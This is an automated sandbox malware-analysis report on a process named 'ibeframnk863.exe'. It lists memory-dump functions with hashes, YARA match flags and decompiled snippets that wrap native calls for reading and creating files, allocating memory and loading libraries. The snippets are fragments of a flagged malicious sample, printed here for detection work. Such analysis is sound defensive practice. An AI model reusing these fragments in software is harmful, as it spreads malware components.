                                                      • Instruction ID: 9b87e0a8550c337b3aa1ac8f8892e9f813eafe8ed11fea6daecfddcf1b9d9882
                                                      • Opcode Fuzzy Hash: 90b9c54deabbc879fbd8c3a561c5c5415320448e02a97b103b0192ada3eac92d
                                                      • Instruction Fuzzy Hash: 93E0EC34995248DFCB40DFB8E8496ADBBB4AB09306F6011AAC809E3350E7305AA4DB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E2630, Relevance: .0, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 34390d223dd2d122332e989229a89239e33ca58672b15f2887460a1549ac604b
                                                      • Instruction ID: ed1a21d07cbead2f3f5efacb1271c95a93f4291d7412212f72a821424ccef0c1
                                                      • Opcode Fuzzy Hash: 34390d223dd2d122332e989229a89239e33ca58672b15f2887460a1549ac604b
                                                      • Instruction Fuzzy Hash: 3CE0EC70955248EFCB40EFB898456ADBBB8AB05305F5001A98949A3358E7305A54CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E1618, Relevance: .0, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d1abb211db9b13e2b8c365b0df91e3f1d3f4f3610428c8b3b5c739627b20521b
                                                      • Instruction ID: 900a5bfffa60b5d5bda38e15e1aa7a8c310b1f58b8506d44be3baed73e24b3d8
                                                      • Opcode Fuzzy Hash: d1abb211db9b13e2b8c365b0df91e3f1d3f4f3610428c8b3b5c739627b20521b
                                                      • Instruction Fuzzy Hash: F4E0EC34D56248DFCB41DFB8E8496ACBBB8EB49305F5441A9C909A3350EB305A60CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E15E0, Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b98b91d6f08395f9a849cbd08bd19eaa1497219eccedfdfa9877d91c2b22ee8
                                                      • Instruction ID: e10d8b091bbb5b5082c42f444ff2f2b8ce5e283fe044614159affafb828c6eb4
                                                      • Opcode Fuzzy Hash: 4b98b91d6f08395f9a849cbd08bd19eaa1497219eccedfdfa9877d91c2b22ee8
                                                      • Instruction Fuzzy Hash: B9D0A9704AA1489BC710CBAA9800AAAB22CE78B208F8010B8C90A23B40DB300AA0C284
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 002E4A18, Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .@Pl$|g=
                                                      • API String ID: 0-2650165475
                                                      • Opcode ID: c848e38544356d72c4e9df426b55a9bdac6b31f6d6223c97a6158326bf2096b1
                                                      • Instruction ID: 4ba0f4a25b37511688a0728e1a3289d114e0b6ebc7f35589fb98e15e837d0ac5
                                                      • Opcode Fuzzy Hash: c848e38544356d72c4e9df426b55a9bdac6b31f6d6223c97a6158326bf2096b1
                                                      • Instruction Fuzzy Hash: CA519D74A212098FD745EFBAED4569E7BF2AF98304F04C439E204EF268DB3059058F91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E1C28, Relevance: .2, Instructions: 248COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ec423288d91dc7c2b298183a934df8ed59db2630d95bf84290e93859c7fc881e
                                                      • Instruction ID: 96483d8f7980a76c571b25316cb9a41fe368f164841a65cfe1e8159c4fbdcd9e
                                                      • Opcode Fuzzy Hash: ec423288d91dc7c2b298183a934df8ed59db2630d95bf84290e93859c7fc881e
                                                      • Instruction Fuzzy Hash: B9A10874E51259CFDF20CFA6C8447DEBBB2BF49300F64806AE409A7251D77449A6CF11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E21F0, Relevance: .2, Instructions: 234COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b74332ac385835fea238e113f8bf38e920f64b5099525f824275895d990f3443
                                                      • Instruction ID: 84c51e8f54cb02836464823a948a4ab7c402ab840195ef023cebed35ae4bdcab
                                                      • Opcode Fuzzy Hash: b74332ac385835fea238e113f8bf38e920f64b5099525f824275895d990f3443
                                                      • Instruction Fuzzy Hash: 97A13470D58289CFDB00CFAAC8846ADFBF5BB49300F64902AC80AB7251D7749999CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E4F0F, Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b73f3ad4e83fdeb6408b5d02db4613084066a7cf306aefdb5552a44f6e06b66
                                                      • Instruction ID: bdc3443f7ecd55b30a7f42bf1529b1ac6885f70bd86cf9014129896798f11260
                                                      • Opcode Fuzzy Hash: 9b73f3ad4e83fdeb6408b5d02db4613084066a7cf306aefdb5552a44f6e06b66
                                                      • Instruction Fuzzy Hash: 68515DB1E156588BEB68CF6B8D4478AFAF3AFC9300F54C1FA850DA6215DB3049858E15
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Analysis Process: ibeframnk863.exe PID: 1580 Parent PID: 2800 ibeframnk863.exeCOMMON

                                                      Executed Functions

                                                      Function 0041A3A3, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 75filenativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 16%
                                                      			E0041A3A3(void* __esi, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44) {

				asm("cli");
				asm("wait");
				asm("wait");
				cs =  *((intOrPtr*)(__esi - 0x5d5a360d));
				asm("in eax, dx");
				if (__eflags >= 0) goto L3;
			}



                                                      0x0041a3a3
                                                      0x0041a3a6
                                                      0x0041a3a7
                                                      0x0041a3a8
                                                      0x0041a3ae
                                                      0x0041a3af

                                                      APIs
                                                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: IA$!JA$bMA$bMA
                                                      • API String ID: 2738559852-3023253649
                                                      • Opcode ID: 229a2886cc2288e5b8235540767ab526e5609a96b5e5c3bfcc4633b169287909
                                                      • Instruction ID: 2d60832f983da85cc79d68e2c6fcc329339d014f732a62b5c5877a93ace40faf
                                                      • Opcode Fuzzy Hash: 229a2886cc2288e5b8235540767ab526e5609a96b5e5c3bfcc4633b169287909
                                                      • Instruction Fuzzy Hash: 7021F4B2200108AFCB18DF99CC81EEB77A9EF8C718F158649FA1D97241D630E851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A400, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 37%
                                                      			E0041A400(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				intOrPtr _t13;
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t13 = _a4;
				_t29 = _t13 + 0xc48;
				E0041AF50(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a21
				_t6 =  &_a32; // 0x414d62
				_t12 =  &_a8; // 0x414d62
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, _t28); // executed
				return _t18;
			}








                                                      0x0041a403
                                                      0x0041a40f
                                                      0x0041a417
                                                      0x0041a41c
                                                      0x0041a422
                                                      0x0041a43d
                                                      0x0041a445
                                                      0x0041a449

                                                      APIs
                                                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: !JA$bMA$bMA
                                                      • API String ID: 2738559852-4222312340
                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040ACE0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                      • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                                                      • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                      • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A34A, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E0041A34A(void* __ecx, signed int __edx, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
				long _t23;

				_pop(_t40);
				 *(__ecx + 0x17) =  *(__ecx + 0x17) ^ __edx;
				_t17 = _a8;
				_t5 = _t17 + 0xc40; // 0xc40
				E0041AF50(0xec8b5588, _a8, _t5,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t23;
			}




                                                      0x0041a34a
                                                      0x0041a34b
                                                      0x0041a353
                                                      0x0041a35f
                                                      0x0041a367
                                                      0x0041a39d
                                                      0x0041a3a1

                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: f960c1e1866b433e4a1d35163a043f51d27afcaa07c889dc607d2d94a8cbea34
                                                      • Instruction ID: 25c6a06c2fd122c6dcea22650046c716ef5356722faa4ee422d0d0093d83993b
                                                      • Opcode Fuzzy Hash: f960c1e1866b433e4a1d35163a043f51d27afcaa07c889dc607d2d94a8cbea34
                                                      • Instruction Fuzzy Hash: 3801A4B2201108AFCB48CF99DC85DEB77A9AF8C354F158249BA1D97251C630EC51CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A350, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A350(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                      0x0041a35f
                                                      0x0041a367
                                                      0x0041a39d
                                                      0x0041a3a1

                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A52B, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A52B(void* __edi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;

				_t11 = _a4;
				_t4 = _t11 + 0xc60; // 0xca0
				E0041AF50(__edi, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}




                                                      0x0041a533
                                                      0x0041a53f
                                                      0x0041a547
                                                      0x0041a569
                                                      0x0041a56d

                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: 0dec7e471faf43d9c61d657979fe0b18efa52aa8e03d672cb9395d53aca3d380
                                                      • Instruction ID: ab5660436ddb3aa512a8858c51d9667996856f1cc9049581caa36711eb98cfda
                                                      • Opcode Fuzzy Hash: 0dec7e471faf43d9c61d657979fe0b18efa52aa8e03d672cb9395d53aca3d380
                                                      • Instruction Fuzzy Hash: 28F0F8B1200209AFCB14DF89DC81EE777A9EF88354F118149FA1D97251D630E821CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A530, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A530(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF50(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                      0x0041a53f
                                                      0x0041a547
                                                      0x0041a569
                                                      0x0041a56d

                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A47A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E0041A47A(void* __eax, intOrPtr _a4, void* _a8) {
				long _t10;
				void* _t13;

				asm("out 0x36, al");
				_t7 = _a4;
				_t2 = _t7 + 0x10; // 0x300
				_t3 = _t7 + 0xc50; // 0x40a933
				E0041AF50(_t13, _a4, _t3,  *_t2, 0, 0x2c);
				_t10 = NtClose(_a8); // executed
				return _t10;
			}





                                                      0x0041a47a
                                                      0x0041a483
                                                      0x0041a486
                                                      0x0041a48f
                                                      0x0041a497
                                                      0x0041a4a5
                                                      0x0041a4a9

                                                      APIs
                                                      • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 43063bb49def2e9c8776e343cad7f0fa0d7d5bf092cadcbe0947896f37d2437a
                                                      • Instruction ID: 1cac5fc2f44f68a02cf9d8ecf26e47b333177b788bcd937ba9b313b829f897f9
                                                      • Opcode Fuzzy Hash: 43063bb49def2e9c8776e343cad7f0fa0d7d5bf092cadcbe0947896f37d2437a
                                                      • Instruction Fuzzy Hash: 8FE012752002147BD714EFE8CC85FD77B68EF48764F15459DBA1DAB246C570E6108BD0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A480, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A480(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a933
				E0041AF50(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                      0x0041a483
                                                      0x0041a486
                                                      0x0041a48f
                                                      0x0041a497
                                                      0x0041a4a5
                                                      0x0041a4a9

                                                      APIs
                                                      • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A700C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                      • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                      • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                      • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A70078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                      • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                      • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                      • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A70048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                      • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                      • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                      • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                      • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                      • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                      • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                      • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                      • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                      • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
